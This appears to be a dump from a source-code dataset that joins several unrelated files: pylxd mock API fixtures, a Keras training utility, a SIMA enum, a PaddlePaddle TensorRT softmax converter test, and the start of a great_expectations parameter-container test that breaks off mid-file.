"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"devices": {"root": {"path": "/", "type": "disk"}},
"ephemeral": True,
"expanded_config": {
"security.privileged": "true",
},
"expanded_devices": {
"eth0": {
"name": "eth0",
"nictype": "bridged",
"parent": "lxdbr0",
"type": "nic",
},
"root": {"path": "/", "type": "disk"},
},
"profiles": ["default"],
"stateful": False,
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "sync",
"metadata": {
"status": "Running",
"status_code": 103,
"disk": {
"root": {
"usage": 10,
}
},
"memory": {
"usage": 15,
"usage_peak": 20,
"swap_usage": 0,
"swap_usage_peak": 5,
},
"network": {
"l0": {
"addresses": [
{
"family": "inet",
"address": "127.0.0.1",
"netmask": "8",
"scope": "local",
}
],
}
},
"pid": 69,
"processes": 100,
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/state$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-new-remote-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"location": "an-remote",
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-new-remote-instance$",
},
{
"status_code": 202,
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance/state$",
},
{
"json": instance_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"text": instance_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "async",
"metadata": {
"metadata": {
"fds": {
"0": "abc",
"1": "def",
"2": "ghi",
"control": "jkl",
}
},
},
"operation": "/1.0/operations/operation-abc?project=default",
},
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/exec$",
},
{
"json": instance_PUT,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
# Instance Snapshots
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"/1.0/instances/an_instance/snapshots/an-snapshot",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"name": "an_instance/an-snapshot",
"stateful": False,
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
{
"text": snapshot_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
# Instance files
{
"text": "This is a getted file",
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fgetted$",
},
{
"text": '{"some": "value"}',
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fjson-get$",
},
{
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fputted$",
},
{
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fputted$",
},
# Images
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/images$",
},
{
"text": images_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/images$",
},
{
"text": images_POST,
"method": "POST",
"url": r"^http://pylxd2.test/1.0/images$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {
"name": "an-alias",
"description": "an-alias",
"target": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"aliases": [
{
"name": "an-alias",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
],
"architecture": "x86_64",
"cached": False,
"filename": "a_image.tar.bz2",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"public": False,
"properties": {},
"size": 1,
"auto_update": False,
"created_at": "1983-06-16T02:42:00Z",
"expires_at": "1983-06-16T02:42:00Z",
"last_used_at": "1983-06-16T02:42:00Z",
"uploaded_at": "1983-06-16T02:42:00Z",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"aliases": [
{
"name": "an-alias",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
],
"architecture": "x86_64",
"cached": False,
"filename": "a_image.tar.bz2",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"public": False,
"properties": {},
"size": 1,
"auto_update": False,
"created_at": "1983-06-16T02:42:00Z",
"expires_at": "1983-06-16T02:42:00Z",
"last_used_at": "1983-06-16T02:42:00Z",
"uploaded_at": "1983-06-16T02:42:00Z",
},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": "0" * 2048,
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/export$",
},
{
"text": image_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
# Image Aliases
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {
"name": "an-alias",
"description": "an-alias",
"target": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"json": {"type": "sync", "status": "Success", "metadata": None},
"method": "POST",
"url": r"^http://pylxd.test/1.0/images/aliases$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": None,
},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": None,
},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/aliases/b-alias$",
},
# Images secret
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {"metadata": {"secret": "abcdefg"}},
},
"method": "POST",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/secret$",
},
# Networks
{
"json": {
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/networks/lo",
"http://pylxd.test/1.0/networks/eth0",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks$",
},
{
"text": networks_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/networks$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "lo",
"type": "loopback",
"used_by": [],
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks/lo$",
},
{
"text": networks_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks/eth(0|1|2)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/networks/eth0$",
},
{
"text": networks_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/networks/eth0$",
},
# Storage Pools
{
"json": {
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/storage-pools/lxd",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools$",
},
{
"json": {
"type": "sync",
"metadata": {
"config": {"size": "0", "source": "/var/lib/lxd/disks/lxd.img"},
"description": "",
"name": "lxd",
"driver": "zfs",
"used_by": [],
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools$",
},
{
"json": {"type": "sync"},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "PATCH",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
# Storage Resources
{
"json": {
"type": "sync",
"metadata": {
"space": {"used": 207111192576, "total": 306027577344},
"inodes": {"used": 3275333, "total": 18989056},
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/resources$",
},
# Storage Volumes
{
"json": {
"type": "sync",
"metadata": [
"/1.0/storage-pools/default/volumes/instances/c1",
"/1.0/storage-pools/default/volumes/instances/c2",
"/1.0/storage-pools/default/volumes/containers/c3",
"/1.0/storage-pools/default/volumes/containers/c4",
"/1.0/storage-pools/default/volumes/virtual-machines/vm1",
"/1.0/storage-pools/default/volumes/virtual-machines/vm2",
"/1.0/storage-pools/default/volumes/images/i1",
"/1.0/storage-pools/default/volumes/images/i2",
"/1.0/storage-pools/default/volumes/custom/cu1",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes$",
},
# create a sync storage volume
{
"json": {"type": "sync"},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"error_code": 0,
"error": "",
"metadata": {
"type": "custom",
"used_by": [],
"name": "cu1",
"config": {
"block.filesystem": "ext4",
"block.mount_options": "discard",
"size": "10737418240",
},
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# create an async storage volume
{
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
},
"status_code": 202,
"method": "POST",
"url": (r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom$"),
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"error_code": 0,
"error": "",
"metadata": {
"type": "custom",
"used_by": [],
"name": "cu1",
"config": {
"block.filesystem": "ext4",
"block.mount_options": "discard",
"size": "10737418240",
},
},
},
"method": "GET",
"url": (
r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom/cu1$"
),
},
# rename a storage volume, sync
{
"json": {
"type": "sync",
"metadata": {"control": "secret1", "fs": "secret2"},
},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# rename a storage volume, async
{
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
"metadata": {"control": "secret1", "fs": "secret2"},
},
"method": "POST",
"status_code": 202,
"url": (
r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom/cu1$"
),
},
{
"json": {"type": "sync"},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
{
"json": {"type": "sync"},
"method": "PATCH",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
{
"json": {"type": "sync"},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# Profiles
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/profiles/an-profile",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/profiles$",
},
{
"text": profiles_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/profiles$",
},
{
"text": profile_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile|an-renamed-profile)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "POST",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
{
"text": profile_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
# Projects
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/projects/test-project",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/projects$",
},
{
"text": projects_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/projects/(test-project|new-project)$",
},
{
"text": projects_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/projects$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/projects/(test-project)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "POST",
"url": r"^http://pylxd.test/1.0/projects/(new-project)$",
},
{
"text": profile_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/projects/(test-project)$",
},
# Operations
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc", "metadata": {"return": 0}},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/operation-abc$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/operation-abc/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc"},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/operation-abc$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/operation-abc/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"id": "images-create-operation",
"metadata": {
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
},
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/images-create-operation$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/images-create-operation/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc"},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/images-create-operation$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/images-create-operation/wait$",
},
]
| 29.950947
| 121
| 0.410367
|
4a159e631ad1abd365562bf10e8180b2e0b0aca4
| 149
|
py
|
Python
|
tests/__init__.py
|
tom-andersson/neuralprocesses
|
7696dc1c8bbe922fb2a1ba18fe0cdda041fc9cfd
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
tom-andersson/neuralprocesses
|
7696dc1c8bbe922fb2a1ba18fe0cdda041fc9cfd
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
tom-andersson/neuralprocesses
|
7696dc1c8bbe922fb2a1ba18fe0cdda041fc9cfd
|
[
"MIT"
] | null | null | null |
import os
import sys
# Add package to path.
file_dir = os.path.dirname(__file__)
sys.path.insert(0, os.path.abspath(os.path.join(file_dir, "..")))
| 18.625
| 65
| 0.718121
|
4a159e943e79c5d8a77b1e703c0cfbebb16473a5
| 3,342
|
py
|
Python
|
utils.py
|
WebVision-Capstone/WebVision-Cap
|
7ccdf5403b79cc51e061918623ce2c4b4c996c19
|
[
"MIT"
] | null | null | null |
utils.py
|
WebVision-Capstone/WebVision-Cap
|
7ccdf5403b79cc51e061918623ce2c4b4c996c19
|
[
"MIT"
] | null | null | null |
utils.py
|
WebVision-Capstone/WebVision-Cap
|
7ccdf5403b79cc51e061918623ce2c4b4c996c19
|
[
"MIT"
] | 1
|
2020-12-12T16:02:06.000Z
|
2020-12-12T16:02:06.000Z
|
"""General utilities
"""
from typing import List
import argparse
import matplotlib.pyplot as plt
import tensorflow as tf
def plot_accuracy_loss(history: tf.keras.callbacks.History,
acc_items: List[str],
loss_items: List[str]):
"""Plot accuracy metrics and loss metrics from training history
Usage:
plot_accuracy_loss(
history,
['accuracy', 'val_accuracy'],
['loss', 'val_loss'])
"""
fig, ax = plt.subplots(ncols = 2, figsize = (15, 7))
fig.suptitle('Accuracy and Loss')
for item in acc_items:
ax[0].plot(history.history[item], label = item)
ax[0].set_xlabel('Epochs')
ax[0].set_ylabel('Accuracy')
ax[0].legend()
for item in loss_items:
ax[1].plot(history.history[item], label = item)
ax[1].set_xlabel('Epochs')
ax[1].set_ylabel('Loss')
ax[1].legend()
def getArgs(argv=None):
parser = argparse.ArgumentParser(
description='Get config inputs')
parser.add_argument('epochs',
metavar='epochs',
type=int,
nargs='?',
action='store',
help='number of training epochs'
)
parser.add_argument('save_path',
metavar='save_path',
type=str,
nargs='?',
action='store',
help='path to save objects (weights, pickles)'
)
parser.add_argument('job_id',
metavar='job_id',
type=str,
nargs='?',
action='store',
help='name or id of job'
)
parser.add_argument('--batch_size',
metavar='batch_size',
type=int,
nargs='?',
default=64,
help='generator batch size'
)
parser.add_argument('--img_size',
metavar='img_size',
type=int,
nargs='?',
default=300,
help='size of the input image (one side of square)'
)
parser.add_argument('--workers',
metavar='workers',
type=int,
nargs='?',
default=1,
help='number of threads to load data'
)
parser.add_argument('--unfreeze_layer',
metavar='workers',
type=str,
nargs='?',
default='',
help='unfreeze layers after this one (ConvNet tower)'
)
parser.add_argument('--path_to_data',
metavar='pickle',
type=str,
nargs='?',
default='',
help='pickle the model history'
)
return parser.parse_args()
| 31.828571
| 77
| 0.413226
|
4a159f02de7df1fdc5bf9310361fc07206411688
| 992
|
py
|
Python
|
src/sima/post/internalpressuredesignfactor.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/post/internalpressuredesignfactor.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/post/internalpressuredesignfactor.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
# Generated with InternalPressureDesignFactor
#
from enum import Enum
from enum import auto
class InternalPressureDesignFactor(Enum):
""""""
DESIGN_PRESSURE = auto()
INCIDENTAL_PRESSURE = auto()
PRODUCTION_CASING_WITH_TUBING_LEAK = auto()
DRILLING_RISER_WITH_EXTREME_PRESSURE = auto()
HYDROSTATIC_TEST = auto()
def label(self):
if self == InternalPressureDesignFactor.DESIGN_PRESSURE:
return "Design pressure (0.60)"
if self == InternalPressureDesignFactor.INCIDENTAL_PRESSURE:
return "Incidental pressure (0.67)"
if self == InternalPressureDesignFactor.PRODUCTION_CASING_WITH_TUBING_LEAK:
return "Production casing with tubing leak (0.81)"
if self == InternalPressureDesignFactor.DRILLING_RISER_WITH_EXTREME_PRESSURE:
return "Drilling riser with extreme pressure (0.81)"
if self == InternalPressureDesignFactor.HYDROSTATIC_TEST:
return "Hydrostatic test (0.9)"
| 41.333333
| 85
| 0.714718
|
4a15a09b0f77eebdf2eedf1c29b20842020da231
| 6,158
|
py
|
Python
|
python/paddle/fluid/tests/unittests/ir/inference/test_trt_convert_softmax.py
|
2742195759/Paddle
|
ce034db1834af85539b22ab68492df9972ff3e69
|
[
"Apache-2.0"
] | 17,085
|
2016-11-18T06:40:52.000Z
|
2022-03-31T22:52:32.000Z
|
python/paddle/fluid/tests/unittests/ir/inference/test_trt_convert_softmax.py
|
2742195759/Paddle
|
ce034db1834af85539b22ab68492df9972ff3e69
|
[
"Apache-2.0"
] | 29,769
|
2016-11-18T06:35:22.000Z
|
2022-03-31T16:46:15.000Z
|
python/paddle/fluid/tests/unittests/ir/inference/test_trt_convert_softmax.py
|
2742195759/Paddle
|
ce034db1834af85539b22ab68492df9972ff3e69
|
[
"Apache-2.0"
] | 4,641
|
2016-11-18T07:43:33.000Z
|
2022-03-31T15:15:02.000Z
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from trt_layer_auto_scan_test import TrtLayerAutoScanTest, SkipReasons
from program_config import TensorConfig, ProgramConfig
import unittest
import numpy as np
import paddle.inference as paddle_infer
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
class TrtConvertSoftmaxTest(TrtLayerAutoScanTest):
def is_program_valid(self, program_config: ProgramConfig) -> bool:
inputs = program_config.inputs
weights = program_config.weights
outputs = program_config.outputs
attrs = [
program_config.ops[i].attrs
for i in range(len(program_config.ops))
]
#The input dimension should be less than or equal to the set axis.
if len(inputs['softmax_input'].shape) <= attrs[0]['axis']:
return False
return True
def sample_program_configs(self):
def generate_input1(attrs: List[Dict[str, Any]], batch):
if self.dims == 4:
return np.ones([batch, 3, 24, 24]).astype(np.float32)
elif self.dims == 3:
return np.ones([batch, 3, 24]).astype(np.float32)
elif self.dims == 2:
return np.ones([batch, 32]).astype(np.float32)
for dims in [2, 3, 4]:
for batch in [1, 2, 4]:
for axis in [-1, 0, 1, 2, 3]:
self.dims = dims
dics = [{"axis": axis}, {}]
ops_config = [{
"op_type": "softmax",
"op_inputs": {
"X": ["softmax_input"]
},
"op_outputs": {
"Out": ["softmax_out"]
},
"op_attrs": dics[0]
}]
ops = self.generate_op_config(ops_config)
program_config = ProgramConfig(
ops=ops,
weights={},
inputs={
"softmax_input": TensorConfig(data_gen=partial(
generate_input1, dics, batch))
},
outputs=["softmax_out"])
yield program_config
def sample_predictor_configs(
self, program_config) -> (paddle_infer.Config, List[int], float):
def generate_dynamic_shape(attrs):
if self.dims == 4:
self.dynamic_shape.min_input_shape = {
"softmax_input": [1, 3, 24, 24]
}
self.dynamic_shape.max_input_shape = {
"softmax_input": [4, 3, 48, 48]
}
self.dynamic_shape.opt_input_shape = {
"softmax_input": [1, 3, 24, 48]
}
elif self.dims == 3:
self.dynamic_shape.min_input_shape = {
"softmax_input": [1, 3, 24]
}
self.dynamic_shape.max_input_shape = {
"softmax_input": [4, 3, 48]
}
self.dynamic_shape.opt_input_shape = {
"softmax_input": [1, 3, 48]
}
elif self.dims == 2:
self.dynamic_shape.min_input_shape = {"softmax_input": [1, 32]}
self.dynamic_shape.max_input_shape = {"softmax_input": [4, 64]}
self.dynamic_shape.opt_input_shape = {"softmax_input": [1, 32]}
def clear_dynamic_shape():
self.dynamic_shape.min_input_shape = {}
self.dynamic_shape.max_input_shape = {}
self.dynamic_shape.opt_input_shape = {}
def generate_trt_nodes_num(attrs, dynamic_shape):
return 1, 2
attrs = [
program_config.ops[i].attrs
for i in range(len(program_config.ops))
]
# for static_shape
clear_dynamic_shape()
if attrs[0]['axis'] == 0:
pass
else:
self.trt_param.precision = paddle_infer.PrecisionType.Float32
yield self.create_inference_config(), generate_trt_nodes_num(
attrs, False), 1e-5
self.trt_param.precision = paddle_infer.PrecisionType.Half
yield self.create_inference_config(), generate_trt_nodes_num(
attrs, False), 1e-5
# for dynamic_shape
generate_dynamic_shape(attrs)
self.trt_param.precision = paddle_infer.PrecisionType.Float32
yield self.create_inference_config(), generate_trt_nodes_num(attrs,
True), 1e-5
self.trt_param.precision = paddle_infer.PrecisionType.Half
yield self.create_inference_config(), generate_trt_nodes_num(attrs,
True), 1e-5
def add_skip_trt_case(self):
def teller1(program_config, predictor_config):
if len(
program_config.inputs['softmax_input'].shape
) == 2 and not predictor_config.tensorrt_dynamic_shape_enabled():
return True
return False
self.add_skip_case(
teller1, SkipReasons.TRT_NOT_IMPLEMENTED,
"The output shape has diff, but we can add shuffle layer to resolve it."
)
def test(self):
self.add_skip_trt_case()
self.run_test()
if __name__ == "__main__":
unittest.main()
| 38.974684
| 84
| 0.546281
|
4a15a10fa8c5130896fdfcba79f7d483e04013ea
| 15,584
|
py
|
Python
|
tests/rule_based_profiler/parameter_builder/test_parameter_container.py
|
pinsleepe/great_expectations
|
37329c906a5a159b54257dbcd897850177eecbcc
|
[
"Apache-2.0"
] | null | null | null |
tests/rule_based_profiler/parameter_builder/test_parameter_container.py
|
pinsleepe/great_expectations
|
37329c906a5a159b54257dbcd897850177eecbcc
|
[
"Apache-2.0"
] | null | null | null |
tests/rule_based_profiler/parameter_builder/test_parameter_container.py
|
pinsleepe/great_expectations
|
37329c906a5a159b54257dbcd897850177eecbcc
|
[
"Apache-2.0"
] | null | null | null |
from typing import Any, Dict, List
from great_expectations.execution_engine.execution_engine import MetricDomainTypes
from great_expectations.rule_based_profiler.types import (
Domain,
ParameterContainer,
build_parameter_container,
build_parameter_container_for_variables,
get_fully_qualified_parameter_names,
get_parameter_values_for_fully_qualified_parameter_names,
)
def test_build_parameter_container(
parameters_with_different_depth_level_values,
multi_part_name_parameter_container,
):
parameter_container: ParameterContainer = ParameterContainer(parameter_nodes=None)
build_parameter_container(
parameter_container=parameter_container,
parameter_values=parameters_with_different_depth_level_values,
)
assert parameter_container == multi_part_name_parameter_container
def test_get_fully_qualified_parameter_names(
parameters_with_different_depth_level_values,
multi_part_name_parameter_container,
):
parameter_container: ParameterContainer = ParameterContainer(parameter_nodes=None)
build_parameter_container(
parameter_container=parameter_container,
parameter_values=parameters_with_different_depth_level_values,
)
domain: Domain = Domain(
domain_type=MetricDomainTypes.COLUMN,
domain_kwargs=None,
details=None,
)
# Convert variables argument to ParameterContainer
variables: ParameterContainer = build_parameter_container_for_variables(
variables_configs={
"my_int": 9,
"my_float": 3.38,
"my_string": "hello",
}
)
parameters: Dict[str, ParameterContainer] = {
domain.id: parameter_container,
}
expected_fully_qualified_parameter_names: List[str] = [
"$variables.my_int",
"$variables.my_float",
"$variables.my_string",
"$parameter.date_strings.yyyy_mm_dd_hh_mm_ss_tz_date_format.value",
"$parameter.date_strings.yyyy_mm_dd_hh_mm_ss_tz_date_format.details",
"$parameter.date_strings.yyyy_mm_dd_date_format.value",
"$parameter.date_strings.yyyy_mm_dd_date_format.details",
"$parameter.date_strings.mm_yyyy_dd_hh_mm_ss_tz_date_format.value",
"$parameter.date_strings.mm_yyyy_dd_hh_mm_ss_tz_date_format.details",
"$parameter.date_strings.mm_yyyy_dd_date_format.value",
"$parameter.date_strings.mm_yyyy_dd_date_format.details",
"$parameter.date_strings.tolerances.max_abs_error_time_milliseconds",
"$parameter.date_strings.tolerances.max_num_conversion_attempts",
"$parameter.tolerances.mostly",
"$parameter.tolerances.financial.usd",
"$parameter.monthly_taxi_fairs.mean_values.value",
"$parameter.monthly_taxi_fairs.mean_values.details",
"$parameter.daily_taxi_fairs.mean_values.value",
"$parameter.daily_taxi_fairs.mean_values.details",
"$parameter.weekly_taxi_fairs.mean_values.value",
"$parameter.weekly_taxi_fairs.mean_values.details",
"$mean",
]
fully_qualified_parameter_names: List[str] = get_fully_qualified_parameter_names(
domain=domain,
variables=variables,
parameters=parameters,
)
assert len(fully_qualified_parameter_names) == len(
expected_fully_qualified_parameter_names
)
assert sorted(fully_qualified_parameter_names) == sorted(
expected_fully_qualified_parameter_names
)
def test_get_parameter_values_for_fully_qualified_parameter_names(
parameters_with_different_depth_level_values,
multi_part_name_parameter_container,
):
parameter_container: ParameterContainer = ParameterContainer(parameter_nodes=None)
build_parameter_container(
parameter_container=parameter_container,
parameter_values=parameters_with_different_depth_level_values,
)
domain: Domain = Domain(
domain_type=MetricDomainTypes.COLUMN,
domain_kwargs=None,
details=None,
)
# Convert variables argument to ParameterContainer
variables: ParameterContainer = build_parameter_container_for_variables(
variables_configs={
"my_int": 9,
"my_float": 3.38,
"my_string": "hello",
}
)
parameters: Dict[str, ParameterContainer] = {
domain.id: parameter_container,
}
expected_parameter_values_for_fully_qualified_parameter_names: Dict[str, Any] = {
"$variables.my_int": 9,
"$variables.my_float": 3.38,
"$variables.my_string": "hello",
"$parameter.date_strings.yyyy_mm_dd_hh_mm_ss_tz_date_format.value": "%Y-%m-%d %H:%M:%S %Z",
"$parameter.date_strings.mm_yyyy_dd_hh_mm_ss_tz_date_format.value": "%m-%Y-%d %H:%M:%S %Z",
"$parameter.date_strings.yyyy_mm_dd_date_format.details": {
"confidence": 0.78,
},
"$parameter.monthly_taxi_fairs.mean_values.value": [
2.3,
9.8,
